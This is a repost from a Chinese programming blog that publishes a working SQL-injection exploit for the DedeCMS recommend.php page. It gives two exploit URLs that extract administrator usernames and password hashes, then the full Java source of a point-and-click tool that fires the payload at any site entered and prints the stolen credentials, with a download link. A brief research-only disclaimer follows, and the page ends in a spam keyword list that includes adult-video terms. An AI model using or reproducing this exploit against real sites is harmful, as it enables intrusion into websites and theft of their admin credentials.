程序博客网 > 列车网络控制系统

DedeCMS全版本通杀SQL注入漏洞利用代码及工具

来源:互联网 发布:列车网络控制系统 编辑:程序博客网 时间:2024/06/07 20:18

dedecms即织梦(PHP开源网站内容管理系统)。织梦内容管理系统(DedeCms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统,近日,网友在dedecms中发现了全版本通杀的SQL注入漏洞,目前官方最新版已修复该漏洞,相关利用代码如下:

www.xxx.com/plus/recommend.php....

EXP:

plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\'  or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select  CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type] [type]=application/octet-stream&_FILES[type][size]=111

EXP2:

plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294


利用工具源码(by 园长):


package org.javaweb.dede.ui;import java.awt.Toolkit;import java.io.BufferedReader;import java.io.InputStreamReader;import java.net.URL;import java.util.regex.Matcher;import java.util.regex.Pattern;  /** * * @author yz */public class MainFrame extends javax.swing.JFrame {      private static final long serialVersionUID = 1L;      /**     * Creates new form MainFrame     */    public MainFrame() {        initComponents();    }      public String request(String url){        String str = "",tmp;        try {            BufferedReader br = new BufferedReader(new InputStreamReader(new URL(url).openStream()));            while((tmp=br.readLine())!=null){                str+=tmp+"\r\n";            }        } catch (Exception e) {            jTextArea1.setText(e.toString());        }        return str;    }      private void initComponents() {          jPanel1 = new javax.swing.JPanel();        jLabel1 = new javax.swing.JLabel();        jTextField1 = new javax.swing.JTextField();        jButton1 = new javax.swing.JButton();        jScrollPane1 = new javax.swing.JScrollPane();        jTextArea1 = new javax.swing.JTextArea();          setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE);          jLabel1.setText("URL:");        jTextField1.setText("http://localhost");          this.setTitle("DedeCms recommend.php注入利用工具-p2j.cn");          int screenWidth = Toolkit.getDefaultToolkit().getScreenSize().width;        int screenHeight = Toolkit.getDefaultToolkit().getScreenSize().height;        this.setBounds(screenWidth / 2 - 229, screenHeight / 2 - 158, 458, 316);          jButton1.setText("获取");        jButton1.addActionListener(new java.awt.event.ActionListener() {            public void actionPerformed(java.awt.event.ActionEvent evt) {                jButton1ActionPerformed(evt);            }        });          jTextArea1.setColumns(20);        jTextArea1.setRows(5);        jScrollPane1.setViewportView(jTextArea1);          javax.swing.GroupLayout jPanel1Layout = new javax.swing.GroupLayout(jPanel1);        jPanel1.setLayout(jPanel1Layout);        jPanel1Layout.setHorizontalGroup(            jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)            .addGroup(jPanel1Layout.createSequentialGroup()                .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING, false)                    .addComponent(jScrollPane1, javax.swing.GroupLayout.Alignment.LEADING)                    .addGroup(javax.swing.GroupLayout.Alignment.LEADING, jPanel1Layout.createSequentialGroup()                        .addContainerGap()                        .addComponent(jLabel1)                        .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)                        .addComponent(jTextField1, javax.swing.GroupLayout.PREFERRED_SIZE, 331, javax.swing.GroupLayout.PREFERRED_SIZE)                        .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)                        .addComponent(jButton1, javax.swing.GroupLayout.PREFERRED_SIZE, 83, javax.swing.GroupLayout.PREFERRED_SIZE)))                .addGap(0, 0, Short.MAX_VALUE))        );        jPanel1Layout.setVerticalGroup(            jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)            .addGroup(jPanel1Layout.createSequentialGroup()                .addContainerGap()                .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)                    .addComponent(jLabel1)                    .addComponent(jTextField1, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)                    .addComponent(jButton1))                .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)                .addComponent(jScrollPane1, javax.swing.GroupLayout.DEFAULT_SIZE, 254, Short.MAX_VALUE))        );          javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane());        getContentPane().setLayout(layout);        layout.setHorizontalGroup(            layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)            .addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)        );        layout.setVerticalGroup(            layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)            .addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)        );          pack();    }// </editor-fold>                             private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {                                                String url = jTextField1.getText();        if(null==url||"".equals(url)){            return ;        }        String result = request(url+"/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294");        Matcher m = Pattern.compile("<h2>(.*)</h2>").matcher(result);        if(m.find()){            String[] s = m.group(1).split("\\|");            if(s.length>2){                jTextArea1.setText("UserName:"+s[1]+"\r\nMD5:"+s[2].substring(3,s[2].length()-1));            }        }    }                                             public static void main(String args[]) {        java.awt.EventQueue.invokeLater(new Runnable() {            public void run() {                new MainFrame().setVisible(true);            }        });    }      // Variables declaration - do not modify                        private javax.swing.JButton jButton1;    private javax.swing.JLabel jLabel1;    private javax.swing.JPanel jPanel1;    private javax.swing.JScrollPane jScrollPane1;    private javax.swing.JTextArea jTextArea1;    private javax.swing.JTextField jTextField1;    // End of variables declaration                  }

利用工具下载地址 http://pan.baidu.com/s/1sj31RLN (本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!)


0 0
列车网络控制系统 列车网络控制系统
原创粉丝点击
热门IT博客
单片机自动光控窗帘单片机自动光控窗帘
淘宝账号和密码全忘记淘宝账号和密码全忘记
四知文言文阅读答案
linux误删除网卡文件
ansys for mac
淘宝直通车开了就亏
软件网络通讯异常
linux如何拷贝文件夹
微商和淘宝哪个可靠
新版知乎如何添加回答
淘宝推荐好的男装店
base64 js 源码
南宁java培训多少钱
python怎么滤波图片
网络违法行为查处
unity3d中人物模型
java 增量代码覆盖率
adobe视频制作软件
node即学即用
方知海外有孤忠
热门问题 老师的惩罚 人脸识别 我在镇武司摸鱼那些年 重生之率土为王 我在大康的咸鱼生活 盘龙之生命进化 天生仙种 凡人之先天五行 春回大明朝 姑娘不必设防,我是瞎子 北阁佛灯 燃灯佛舍利塔 燃灯上古佛图片 供佛酥油灯 莲花灯供佛灯 酥油灯供佛 佛灯图片 供佛灯图片 佛前供灯 91佛爷连续8次完整 佛爷在线 佛爷美容院老板娘 91佛爷在线 佛爷老板娘 东北小佛爷 91佛爷大战健身房在线播放 佛爷美容院老板娘联系方式 佛爷离异第三部完整在线播放 91佛爷离异d奶娇小气在线播放 佛爷为什么要守护古潼京 佛爷健身房 91佛爷与美容院老板全集 91佛爷美容院 佛爷离异 91佛爷美容院钟点房在线 佛爷91 佛爷离异气质 佛爷美容院第三季 佛爷大战美容院老板娘 91佛爷d奶离异气质 91佛爷健身房第2部在线播放 傅家三爷信佛如魔免费 91佛爷离异在线播放 佛爷91美容院共多少部 91佛爷离异按捺不住 佛都 菩萨是佛吗 泰国阴牌真实记录 泰国阴牌反噬实例 泰国龙婆 崇迪

程序博客网,程序员的互联网技术博客家园。csdn论坛精品 msdn技术资料都在这里